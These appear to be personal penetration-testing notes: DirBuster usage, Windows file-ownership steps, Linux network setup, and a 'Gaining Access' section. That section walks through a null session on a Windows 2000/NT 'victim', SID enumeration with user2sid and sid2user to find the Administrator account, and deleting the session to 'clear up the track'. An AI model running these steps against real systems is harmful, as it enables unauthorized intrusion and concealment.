DirBuster

Quick open:

1. Open shell. 
2. Type dirbuster and hit enter.
3. Fill the target URL.
4. And then choose below file for "File with dir/file" field:
• /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Wordlist for Dirbuster Path: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Or run from jar file (If you plan to utilize the memory usage since DirBuster require quite some resources before it went kaput)::

Command:
java -Xmx8G -jar DirBuster-1.0-RC1.jar -u -l

-Xmx8G : assign 8gb memory for java process
-l : path for wordlist

Take ownership on file

Steps:

1. Select any file you want to take ownership.
2. Right click and choose "Properties".
3. Go to "Security" tab and click "Advanced".
4. Go to "Owner" tab, click on "Edit" and choose your username. Afterthat, click Apply.
5. At "Security" tab , click "Edit"and a box of list of users will popup. Click at your username (created on step 3), and check the box titled "Full Control".
6. Click "Ok"
Done.

Quick setup network

No network up on this machine currently

Quick setup for network:
1. Open shell
2. Type this: ifconfig eth0 up
3. Next, this: dhclient eth0
Done.

Set to other IP:
1. Open shell
2. Type this: ifconfig eth0 ipaddress
3. Done

Gaining Access

Manipulating Guest account
Victim Platform: Windows 2000/NT.
Create null session on victim:
C:\PSEUDO>net use \\ipaddress\IPC$ "" /user: ""

After "The command completed successfully.", user2sid:
C:\PSEUDO>user2sid \\10.2.18.205 Guest

S-1-5-21-602162358-152049171-839522115-501

Number of subauthorities is 5
Domain is U0401
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

Copy: 5-21-602162358-152049171-839522115-501
Replace -501 with -500 as below and use the sid2user:

C:\PSEUDO>sid2user \\10.2.18.205 5 21 602162358 152049171 839522115 500

Name is Administrator
Domain is U0401
Type of SID is SidTypeUser

Clear up the track:
C:\PSEUDO>net use \\ipaddress /delete